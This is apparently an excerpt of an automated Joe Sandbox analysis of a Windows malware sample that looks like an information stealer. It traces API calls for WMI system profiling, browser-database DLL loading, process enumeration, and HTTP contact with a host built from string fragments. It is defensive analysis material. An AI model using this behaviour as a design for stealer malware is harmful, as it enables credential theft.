                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2238633743-0
                                                                                                                                                                        • Opcode ID: 3795c2dcf0ab894f8e611efe9857dcb6342e9bd51ad1102324ab242e3ec64430
                                                                                                                                                                        • Instruction ID: ac33998399804449391722fd46492297858e0ff65677007b7b7aa634e65e21a8
                                                                                                                                                                        • Opcode Fuzzy Hash: 3795c2dcf0ab894f8e611efe9857dcb6342e9bd51ad1102324ab242e3ec64430
                                                                                                                                                                        • Instruction Fuzzy Hash: 8171CA79903222AFDB037FA6FC499247FBEF749301B119927E9018A270D7728860EF54

Control-flow Graph

APIs
  • Part of subcall function 0019051E: lstrlenA.KERNEL32(?,?,001971B6,001B66BE,001B66BB,?,?,?,?,001985D1), ref: 00190524
  • Part of subcall function 0019051E: lstrcpyA.KERNEL32(00000000,00000000,?,001971B6,001B66BE,001B66BB,?,?,?,?,001985D1), ref: 00190556
  • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
  • Part of subcall function 00196908: StrCmpCA.SHLWAPI(?,ERROR), ref: 0019695C
  • Part of subcall function 00196908: lstrlenA.KERNEL32(?), ref: 00196967
  • Part of subcall function 00196908: StrStrA.SHLWAPI(00000000,?), ref: 0019697C
  • Part of subcall function 00196908: lstrlenA.KERNEL32(?), ref: 0019698B
  • Part of subcall function 00196908: lstrlenA.KERNEL32(00000000), ref: 001969A4
  • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
• StrCmpCA.SHLWAPI(?,ERROR), ref: 00196AE2
• StrCmpCA.SHLWAPI(?,ERROR), ref: 00196B3B
• StrCmpCA.SHLWAPI(?,ERROR), ref: 00196B9B
• StrCmpCA.SHLWAPI(?,ERROR), ref: 00196BF4
• StrCmpCA.SHLWAPI(?,ERROR), ref: 00196C0A
• StrCmpCA.SHLWAPI(?,ERROR), ref: 00196C20
• StrCmpCA.SHLWAPI(?,ERROR), ref: 00196C32
• Sleep.KERNEL32(0000EA60), ref: 00196C41
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: lstrlen$lstrcpy$Sleep
• String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
• API String ID: 2840494320-608462545
• Opcode ID: 42e2cfb7ababe4000103049995a9f492b572998e4482c8d522c5dfb260c686a1
• Instruction ID: ce6d568c29da03337c9472915d3dfabfdf1957c549b33584644e55693bde5208
• Opcode Fuzzy Hash: 42e2cfb7ababe4000103049995a9f492b572998e4482c8d522c5dfb260c686a1
• Instruction Fuzzy Hash: 5691D432E40628ABDF52FBA4ED429CC77B4AF24704F518061F915B7166DB34AF0A8B91

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 1487 181666-18169e GetTempPathW 1488 181809-18180b 1487->1488 1489 1816a4-1816cb wsprintfW 1487->1489 1491 1817fa-181808 call 19d05a 1488->1491 1490 1816d0-1816f5 CreateFileW 1489->1490 1490->1488 1493 1816fb-18174e GetProcessHeap RtlAllocateHeap _time64 srand rand call 1a3c60 WriteFile 1490->1493 1493->1488 1497 181754-18175a 1493->1497 1497->1488 1498 181760-18179c call 1a3c60 CloseHandle CreateFileW 1497->1498 1498->1488 1501 18179e-1817b1 ReadFile 1498->1501 1501->1488 1502 1817b3-1817b9 1501->1502 1502->1488 1503 1817bb-1817f1 call 1a3c60 GetProcessHeap RtlFreeHeap CloseHandle 1502->1503 1503->1490 1506 1817f7-1817f9 1503->1506 1506->1491
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 00181696
• wsprintfW.USER32 ref: 001816BC
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 001816E6
• GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 001816FE
• RtlAllocateHeap.NTDLL(00000000), ref: 00181705
• _time64.MSVCRT ref: 0018170E
• srand.MSVCRT ref: 00181715
• rand.MSVCRT ref: 0018171E
• _memset.LIBCMT ref: 0018172E
• WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00181746
• _memset.LIBCMT ref: 00181763
• CloseHandle.KERNEL32(?), ref: 00181771
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0018178D
• ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 001817A9
• _memset.LIBCMT ref: 001817BE
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 001817C8
• RtlFreeHeap.NTDLL(00000000), ref: 001817CF
• CloseHandle.KERNEL32(?), ref: 001817DB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
• String ID: %s%s$delays.tmp
• API String ID: 1620473967-1413376734
• Opcode ID: 2282131e860ae1a35bfe4a97dcd2016a2e96f43e5cc2066303e818be5a1e3656
• Instruction ID: ae976be826ee0df9441edb155d3617704968abcc6e83e0d4e074a12e3d6e0acf
• Opcode Fuzzy Hash: 2282131e860ae1a35bfe4a97dcd2016a2e96f43e5cc2066303e818be5a1e3656
• Instruction Fuzzy Hash: E74183B2900218BBDB216B61DC4DFAF7B7DEF89751F1006A9B10AE1051DB318A95CF60

                                                                                                                                                                        Control-flow Graph

APIs
• __EH_prolog3_catch_GS.LIBCMT ref: 001917E3
• CoInitializeEx.OLE32(00000000,00000000,0000004C,00193F39,Install Date: ,001B68B8,00000000,Windows: ,001B68A8,Work Dir: In memory,001B6890), ref: 001917F4
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00191805
• CoCreateInstance.OLE32(001B2F00,00000000,00000001,001B2E30,?), ref: 0019181F
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00191855
• VariantInit.OLEAUT32(?), ref: 001918B0
  • Part of subcall function 0019172C: __EH_prolog3_catch.LIBCMT ref: 00191733
  • Part of subcall function 0019172C: CoCreateInstance.OLE32(001B31B0,00000000,00000001,001BAF60,?,00000018,001918D6,?), ref: 00191756
  • Part of subcall function 0019172C: SysAllocString.OLEAUT32(?), ref: 00191763
  • Part of subcall function 0019172C: _wtoi64.MSVCRT ref: 00191796
  • Part of subcall function 0019172C: SysFreeString.OLEAUT32(?), ref: 001917AF
  • Part of subcall function 0019172C: SysFreeString.OLEAUT32(00000000), ref: 001917B6
• FileTimeToSystemTime.KERNEL32(?,?), ref: 001918DF
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 001918EB
• HeapAlloc.KERNEL32(00000000), ref: 001918F2
• VariantClear.OLEAUT32(?), ref: 00191931
• wsprintfA.USER32 ref: 0019191E
  • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
• String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
• API String ID: 2280294774-461178377
• Opcode ID: 2410f626dbf2a0422c08dad56b63ad1257533aac18fd12fbd944bf75a0eefa31
• Instruction ID: b000304e2bc15b9501b72a599a3e32511ca399046f4a84ef157ed3aac11b078b
• Opcode Fuzzy Hash: 2410f626dbf2a0422c08dad56b63ad1257533aac18fd12fbd944bf75a0eefa31
• Instruction Fuzzy Hash: 3A413A71940209BBDB119BE5DC89EFFBBBDEF89B11F10410AF611E6194D7789981CB20

Control-flow Graph

APIs
  • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
  • Part of subcall function 00190C28: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001813B9), ref: 00190C34
  • Part of subcall function 00190C28: HeapAlloc.KERNEL32(00000000,?,?,?,001813B9), ref: 00190C3B
  • Part of subcall function 00190C28: GetUserNameA.ADVAPI32(00000000,001813B9), ref: 00190C4F
  • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
  • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
  • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
  • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
• CloseHandle.KERNEL32(00000000,?,?,?,?,001985D1), ref: 0019711F
• OpenEventA.KERNEL32(001F0003,00000000,?,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019712E
• CreateDirectoryA.KERNEL32(?,00000000,001B66D6), ref: 0019764C
• InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 0019770D
• InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00197726
  • Part of subcall function 00184B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00184BCD
  • Part of subcall function 00184B2E: StrCmpCA.SHLWAPI(?), ref: 00184BEB
  • Part of subcall function 00193A02: StrCmpCA.SHLWAPI(?,block,?,?,00197786), ref: 00193A17
  • Part of subcall function 00193A02: ExitProcess.KERNEL32 ref: 00193A22
  • Part of subcall function 00185F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00185FD8
  • Part of subcall function 00185F39: StrCmpCA.SHLWAPI(?), ref: 00185FF6
  • Part of subcall function 001931D8: strtok_s.MSVCRT ref: 001931F7
  • Part of subcall function 001931D8: strtok_s.MSVCRT ref: 0019327A
• Sleep.KERNEL32(000003E8), ref: 00197ADC
  • Part of subcall function 00185F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0018618E
  • Part of subcall function 00185F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 001861D2
  • Part of subcall function 00185F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00186200
• CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,001985D1), ref: 00197142
  • Part of subcall function 00192554: __EH_prolog3_catch_GS.LIBCMT ref: 0019255E
  • Part of subcall function 00192554: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00197E73,.exe,001B6CD4,001B6CD0,001B6CCC,001B6CC8,001B6CC4,001B6CC0,001B6CBC,001B6CB8,001B6CB4,001B6CB0,001B6CAC), ref: 0019257D
  • Part of subcall function 00192554: Process32First.KERNEL32(00000000,00000128), ref: 0019258D
  • Part of subcall function 00192554: Process32Next.KERNEL32(00000000,00000128), ref: 0019259F
  • Part of subcall function 00192554: StrCmpCA.SHLWAPI(?), ref: 001925B1
  • Part of subcall function 00192554: CloseHandle.KERNEL32(00000000), ref: 001925C5
• CloseHandle.KERNEL32(?), ref: 00198042
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
                                                                                                                                                                        • String ID: .exe$.exe$_DEBUG.zip$cowod.$df523263f44cc8d55414a260a0197e4a$hopto$http://$org
                                                                                                                                                                        • API String ID: 305159127-264486462
                                                                                                                                                                        • Opcode ID: 49d2d279ba99b8024e738dcf232e569f0ad07baf46e4dc8a02818c05ebfae0ad
                                                                                                                                                                        • Instruction ID: e6e6ed8a9762334e94f1dcb6a7679356df331dcb45a83286833abdbbef4f39c6
                                                                                                                                                                        • Opcode Fuzzy Hash: 49d2d279ba99b8024e738dcf232e569f0ad07baf46e4dc8a02818c05ebfae0ad
                                                                                                                                                                        • Instruction Fuzzy Hash: 59921F329083559FDA22FF24D842A8EB7E4FFA4704F414929F59467152DB74AE0ACF83

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2254 185237-1852c9 call 1904ee call 184ab6 GetProcessHeap RtlAllocateHeap InternetOpenA StrCmpCA 2259 1852cb 2254->2259 2260 1852cd-1852d3 2254->2260 2259->2260 2261 1852d9-1852ff InternetConnectA 2260->2261 2262 18544b-18546d InternetCloseHandle call 182920 * 2 2260->2262 2263 18543f-185445 InternetCloseHandle 2261->2263 2264 185305-185340 HttpOpenRequestA 2261->2264 2276 185473-185481 call 19d05a 2262->2276 2263->2262 2266 185433-185439 InternetCloseHandle 2264->2266 2267 185346-185348 2264->2267 2266->2263 2269 18534a-185360 InternetSetOptionA 2267->2269 2270 185366-18539c HttpSendRequestA HttpQueryInfoA 2267->2270 2269->2270 2272 1853bb-1853bd 2270->2272 2273 18539e-1853b6 call 182920 * 2 2270->2273 2272->2266 2277 1853bf 2272->2277 2273->2276 2278 18542b-185431 2277->2278 2278->2266 2281 1853c1-1853e8 InternetReadFile 2278->2281 2281->2266 2284 1853ea-185429 2281->2284 2284->2278 2284->2284
APIs
  • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
  • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AE8
  • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AEE
  • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AF4
  • Part of subcall function 00184AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00184B06
  • Part of subcall function 00184AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00184B0E
• GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0018527E
• RtlAllocateHeap.NTDLL(00000000), ref: 00185285
• InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 001852A7
• StrCmpCA.SHLWAPI(?), ref: 001852C1
• InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001852F1
• HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00185330
• InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00185360
• HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0018536B
• HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00185394
• InternetReadFile.WININET(?,?,00000400,?), ref: 001853DA
• InternetCloseHandle.WININET(?), ref: 00185439
• InternetCloseHandle.WININET(?), ref: 00185445
• InternetCloseHandle.WININET(?), ref: 00185451
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
• String ID: GET
• API String ID: 442264750-1805413626
• Opcode ID: bdf3124790010b3a7da51ad926c36c274d51d92884e09f49cb84eee557da59a0
• Instruction ID: 0e398d2399c855a3e0ed846450ad4961be026562a852361186ef5ef0058baaae
• Opcode Fuzzy Hash: bdf3124790010b3a7da51ad926c36c274d51d92884e09f49cb84eee557da59a0
• Instruction Fuzzy Hash: A751197590192CAFDB21AF64EC85BEFBBB9EB08346F0041E5F909A6150DB705F818F90
APIs
• _memset.LIBCMT ref: 001812A7
• _memset.LIBCMT ref: 001812B6
• lstrcatA.KERNEL32(?,001BA9EC), ref: 001812D0
• lstrcatA.KERNEL32(?,001BA9F0), ref: 001812DE
• lstrcatA.KERNEL32(?,001BA9F4), ref: 001812EC
• lstrcatA.KERNEL32(?,001BA9F8), ref: 001812FA
• lstrcatA.KERNEL32(?,001BA9FC), ref: 00181308
• lstrcatA.KERNEL32(?,001BAA00), ref: 00181316
• lstrcatA.KERNEL32(?,001BAA04), ref: 00181324
• lstrcatA.KERNEL32(?,001BAA08), ref: 00181332
• lstrcatA.KERNEL32(?,001BAA0C), ref: 00181340
• lstrcatA.KERNEL32(?,001BAA10), ref: 0018134E
• lstrcatA.KERNEL32(?,001BAA14), ref: 0018135C
• lstrcatA.KERNEL32(?,001BAA18), ref: 0018136A
• lstrcatA.KERNEL32(?,001BAA1C), ref: 00181378
  • Part of subcall function 00190C5A: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00181385), ref: 00190C66
  • Part of subcall function 00190C5A: HeapAlloc.KERNEL32(00000000,?,?,?,00181385), ref: 00190C6D
  • Part of subcall function 00190C5A: GetComputerNameA.KERNEL32(00000000,00181385), ref: 00190C81
• ExitProcess.KERNEL32 ref: 001813E3
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$HeapProcess_memset$AllocComputerExitName
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1553874529-0
                                                                                                                                                                        • Opcode ID: 1d8ffee69d79e0a0dcd36f12862e7359c553399be845f5325d5407c81abc70d1
                                                                                                                                                                        • Instruction ID: 0083012a229e6790008487b1b3cc42bf4a7ccef82aeb111bacb4e742c76c6fb4
                                                                                                                                                                        • Opcode Fuzzy Hash: 1d8ffee69d79e0a0dcd36f12862e7359c553399be845f5325d5407c81abc70d1
                                                                                                                                                                        • Instruction Fuzzy Hash: 5E4154B6D0422C77CB20ABB18C59FDB7BACAF15760F900591E999E3041D774AB89CF90
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
